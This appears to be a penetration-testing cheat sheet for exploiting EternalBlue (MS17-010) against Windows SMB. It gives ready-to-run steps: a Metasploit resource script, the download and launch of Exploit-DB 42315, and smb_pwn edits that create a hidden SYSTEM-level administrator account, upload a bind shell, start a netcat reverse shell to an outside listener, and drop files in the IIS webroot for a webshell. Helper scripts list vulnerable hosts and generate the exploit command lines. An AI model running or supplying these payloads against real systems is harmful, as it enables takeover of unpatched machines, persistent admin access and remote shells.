EternalBlue (CVE-2017-0144 / MS17-010)

Detection

IP=x.x.x.x
nmap -Pn -sV -p 445 --script=smb-vuln* -d $IP
nmap -Pn -sV -p 445 --script=smb-vuln* --script-args=smbdomain=example,smbusername=user1,smbpassword=mypass -d $IP

smb-vuln-ms17-010 is the check that matters here; the wildcard also runs the other smb-vuln scripts against the host. The second form passes credentials for targets that refuse anonymous SMB sessions. -d turns on nmap debug output; drop it if the result is too noisy.
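When the scan covers a whole range, write the results with -oX and let a script pick the hosts to exploit. The Python 3 script below is an added example, not code from the original page or from nmap: it reads nmap XML, looks at every smb-vuln-* host script result and returns the addresses whose state is VULNERABLE or LIKELY VULNERABLE. It also deliberately rejects NOT VULNERABLE, which a naive substring match on "VULNERABLE" would accept. The embedded XML is a constructed excerpt in the shape of nmap's -oX output, trimmed to the elements the parser reads; the addresses are placeholders.

```python
"""Added example: pick exploitable hosts out of `nmap -oX scan.xml ... --script=smb-vuln*`.
Python 3, standard library only. Not part of the original page or of nmap."""
import xml.etree.ElementTree as ET

# Constructed excerpt in the layout of nmap's -oX output, trimmed to what the parser reads.
# Addresses are placeholders; the state strings are the ones nmap's vulns library emits.
SAMPLE_XML = """<?xml version="1.0"?>
<nmaprun>
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="title">Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)</elem>
          <elem key="state">VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.0.0.6" addrtype="ipv4"/>
    <hostscript>
      <script id="smb-vuln-ms17-010" output="NOT VULNERABLE">
        <table key="CVE-2017-0143">
          <elem key="state">NOT VULNERABLE</elem>
        </table>
      </script>
    </hostscript>
  </host>
  <host>
    <address addr="10.0.0.7" addrtype="ipv4"/>
  </host>
</nmaprun>
"""


def is_vulnerable_state(state):
    """True for 'VULNERABLE', 'VULNERABLE (Exploitable)' and 'LIKELY VULNERABLE';
    False for 'NOT VULNERABLE', 'ERROR' and anything else. A plain substring test
    on 'VULNERABLE' would wrongly accept 'NOT VULNERABLE'."""
    s = state.strip().upper()
    return s.startswith("VULNERABLE") or s.startswith("LIKELY VULNERABLE")


def smb_vuln_findings(xml_text):
    """Map each IPv4 address to (script id, vuln key, state) tuples of its smb-vuln-* results."""
    findings = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = next((a.get("addr") for a in host.findall("address")
                     if a.get("addrtype") == "ipv4"), None)
        if addr is None:
            continue
        for script in host.iter("script"):
            script_id = script.get("id", "")
            if not script_id.startswith("smb-vuln"):
                continue
            # nmap's vulns library emits one <table key="CVE-..."> per finding with a state elem
            for table in script.findall("table"):
                state = table.findtext("elem[@key='state']")
                if state is not None:
                    findings.setdefault(addr, []).append((script_id, table.get("key"), state.strip()))
    return findings


def exploitable_hosts(xml_text):
    """Sorted addresses with at least one vulnerable or likely-vulnerable smb-vuln result."""
    return sorted(addr for addr, rows in smb_vuln_findings(xml_text).items()
                  if any(is_vulnerable_state(state) for _, _, state in rows))


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_XML
    for addr in exploitable_hosts(text):
        print(addr)
```

Run it as `python3 triage.py scan.xml` (the file name is an assumption) and feed the printed addresses to the exploit of your choice; without an argument it runs against the embedded sample.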

Exploit using Metasploit

When it works, a session is opened. See Metasploit.

msf-smb-exploit.rc

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS x.x.x.x
set PAYLOAD windows/x64/shell_bind_tcp
set VERBOSE true
set ExitOnSession false
exploit -j

Run the exploit

sudo msfconsole -q -r msf-smb-exploit.rc

Exploit manually

Exploit-DB 42315 is worawit's zzz_exploit.py. It imports mysmb.py, which Exploit-DB publishes separately under the same ID in its bin-sploits repository; save that file next to 42315.py under the name mysmb.py:

searchsploit -m 42315
wget -O mysmb.py https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/42315.py

Add payload to the exploit

Edit the function smb_pwn in 42315.py to add a payload. The default body only creates the file c:\pwned.txt as proof of execution. Two helpers from the exploit do the work: smb_send_file writes a local file to the given drive's administrative share (drive 'C' means C$), and service_exec starts a command through the Service Control Manager, so it runs as SYSTEM.

Payload 1 – Add a user

The commands run as SYSTEM through service_exec, so the account is created and added to the local Administrators group without any further privilege escalation. Choose a password that satisfies the target's password policy (length, complexity); otherwise net user fails and no account is created.

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Add a user
        service_exec(conn, r'net user /add myprecious yep-MS17-010')
        service_exec(conn, r'net localgroup "Administrators" myprecious /add')

Payload 2 – Bind shell

msfvenom -p windows/x64/shell_bind_tcp LPORT=4444 -f exe > shell.exe

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Upload the bind shell to C:\test.exe and start it via the SCM; it listens on 4444
        smb_send_file(smbConn, 'shell.exe', 'C', '/test.exe')
        service_exec(conn, r'c:\test.exe')

Payload 3 – Reverse shell with Netcat

cp /usr/share/windows-resources/binaries/nc.exe .

def smb_pwn(conn, arch):
        smbConn = conn.get_smbconnection()

        # Upload netcat to C:\test.exe and connect back to the listener (start the listener first)
        smb_send_file(smbConn, 'nc.exe', 'C', '/test.exe')
        service_exec(conn, r'C:\test.exe -nv x.x.x.x 4444 -e C:\Windows\System32\cmd.exe')

Payload 4 – Send file to IIS default directory

Adapt to get a webshell.

smb_send_file(smbConn, 'test.txt', 'C', '/inetpub/wwwroot/test.txt')

Custom SMB Port

If the target listens on a port other than 445, make the port configurable in MYSMB (mysmb.py); the original hardcodes sess_port=445. Pass the constructor argument through to smb.SMB instead of hardcoding the port a second time:

class MYSMB(smb.SMB):
        def __init__(self, remote_host, remote_port=4555, use_ntlmv2=True, timeout=8):
                self.__use_ntlmv2 = use_ntlmv2
                self._default_tid = 0
                self._pid = os.getpid() & 0xffff
                self._last_mid = random.randint(1000, 20000)
                if 0x4000 <= self._last_mid <= 0x4110:
                        self._last_mid += 0x120
                self._pkt_flags2 = 0
                self._last_tid = 0  # last tid from connect_tree()
                self._last_fid = 0  # last fid from nt_create_andx()
                self._smbConn = None
                # the SMB session goes to remote_port (default above) rather than the hardcoded 445
                smb.SMB.__init__(self, remote_host, remote_host, sess_port=remote_port, timeout=timeout)

42315.py constructs MYSMB with only the target host, so either keep the custom port as the default (as above) or add remote_port=... at that call site.

Find named PIPE

42315.py needs the name of a pipe that the credentials configured in it (empty by default, i.e. a null session) are allowed to open on the target. List the pipes exported over SMB with rpcdump (the ncacn_np bindings) or with pipe-scan. A full-port nmap scan is worth running as well: services such as SQL Server expose pipes that are not RPC endpoints and therefore never show up in rpcdump output.

IP=x.x.x.x
impacket-rpcdump $IP > rpc.txt
grep ncacn_np rpc.txt | sort | uniq
git clone https://github.com/p33kab00/pipe-scan.git
cd pipe-scan
python2 pipe-scan.py $IP 139
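The grep above leaves you with raw binding strings. The Python 3 script below is an added example, not code from the original page or from impacket or zzz_exploit: it parses rpcdump output, extracts the unique pipe names from the ncacn_np bindings (most-referenced first, which is only an ordering and says nothing about which pipes allow anonymous access), converts the UNC form \\HOST\pipe\NAME into the bare name the exploit takes, and emits one python2 42315.py line per candidate with backslashes in nested names such as sql\query quoted for the shell. The embedded rpcdump excerpt is constructed in the layout impacket-rpcdump prints; the host name, address and interface set are placeholders.

```python
"""Added example: turn impacket-rpcdump output into the pipe argument 42315.py expects.
Python 3, standard library only. Not part of the original page, impacket or zzz_exploit."""
import re
import shlex
from collections import Counter

# Constructed excerpt in the layout impacket-rpcdump prints (one Bindings block per interface).
# Host name, address and the exact set of interfaces are placeholders.
SAMPLE_RPCDUMP = r"""
Protocol: [MS-EVEN]: EventLog Remoting Protocol
Provider: wevtsvc.dll
UUID    : 82273FDC-E32A-18C3-3F78-827929DC23EA v0.0
Bindings:
          ncacn_np:\\WIN7[\pipe\eventlog]
          ncacn_ip_tcp:10.0.0.5[49154]

Protocol: [MS-RPRN]: Print System Remote Protocol
Provider: spoolsv.exe
UUID    : 12345678-1234-ABCD-EF00-0123456789AB v1.0
Bindings:
          ncacn_np:\\WIN7[\PIPE\spoolss]
          ncalrpc:[spoolss]

Protocol: [MS-SAMR]: Security Account Manager (SAM) Remote Protocol
Provider: samsrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AC v1.0
Bindings:
          ncacn_np:\\WIN7[\pipe\lsass]
          ncacn_np:\\WIN7[\PIPE\samr]

Protocol: [MS-LSAT]: Local Security Authority (Translation Methods) Remote
Provider: lsasrv.dll
UUID    : 12345778-1234-ABCD-EF00-0123456789AB v0.0
Bindings:
          ncacn_np:\\WIN7[\pipe\lsass]
          ncacn_np:\\WIN7[\pipe\lsarpc]
"""

# ncacn_np:\\HOST[\pipe\NAME] -> NAME; NAME may itself contain backslashes (sql\query)
NP_BINDING_RE = re.compile(r"ncacn_np:\\\\(?P<host>[^\[\]]+)\[\\pipe\\(?P<pipe>[^\]]+)\]",
                           re.IGNORECASE)
# \\HOST\pipe\NAME (UNC form) -> NAME
UNC_PIPE_RE = re.compile(r"^\\\\[^\\]+\\pipe\\(?P<pipe>.+)$", re.IGNORECASE)


def named_pipes(rpcdump_text):
    r"""Unique pipe names from the ncacn_np bindings, ordered by how many interfaces
    bind to them (most first), then alphabetically. The \pipe\ prefix is stripped,
    which is the form 42315.py takes on the command line."""
    counts = Counter(m.group("pipe") for m in NP_BINDING_RE.finditer(rpcdump_text))
    return [name for name, _ in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0].lower()))]


def pipe_name_from_unc(unc_path):
    r"""r'\\10.0.0.5\pipe\sql\query' -> r'sql\query'; None if the path is not a \pipe\ path."""
    m = UNC_PIPE_RE.match(unc_path)
    return m.group("pipe") if m else None


def exploit_command(ip, pipe, script="42315.py"):
    r"""Shell line that runs the exploit against one pipe. Backslashes in nested names
    such as sql\query are quoted so bash hands them to Python unchanged."""
    return "python2 {} {} {}".format(shlex.quote(script), shlex.quote(ip), shlex.quote(pipe))


def exploit_commands(ip, rpcdump_text):
    """One command per candidate pipe, in the order named_pipes() returns them."""
    return [exploit_command(ip, pipe) for pipe in named_pipes(rpcdump_text)]


if __name__ == "__main__":
    import sys
    ip = sys.argv[1] if len(sys.argv) > 1 else "10.0.0.5"
    text = open(sys.argv[2]).read() if len(sys.argv) > 2 else SAMPLE_RPCDUMP
    print("\n".join(exploit_commands(ip, text)))
```

Usage: `python3 pipes.py $IP rpc.txt` (the script name is an assumption) prints the candidate commands; run them one at a time until a pipe is accepted, since the exploit stops at the first pipe the credentials cannot open.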

On Windows

Use pipelist.exe from Sysinternals.

.\pipelist.exe

Run the exploit

The exploit is Python 2 only; it does not run under Python 3. Recent impacket releases are Python 3 only as well, so install one that still supports Python 2. If the target refuses null sessions, set USERNAME and PASSWORD near the top of 42315.py before running it.

pip2 install impacket
IP=x.x.x.x
# second argument: the pipe name without the \pipe\ prefix
python2 42315.py $IP $PIPE
python2 42315.py $IP eventlog
# nested pipe names keep their inner backslash: \\$IP\pipe\sql\query
python2 42315.py $IP sql\\query

service_exec starts the command as a Windows service. cmd.exe, nc.exe and the like never report back to the Service Control Manager, so StartService returns ERROR_SERVICE_REQUEST_TIMEOUT even though the process has already been launched. The error is expected and the payload usually still works.

Payload 1 (user added)

rdesktop -u myprecious -p yep-MS17-010 $IP -r disk:myshare=/home/kali/share

Payload 2 (bind shell)

nc -nv $IP 4444

Payload 3 (reverse shell, start a listener before exploit)

nc -nlvkp 4444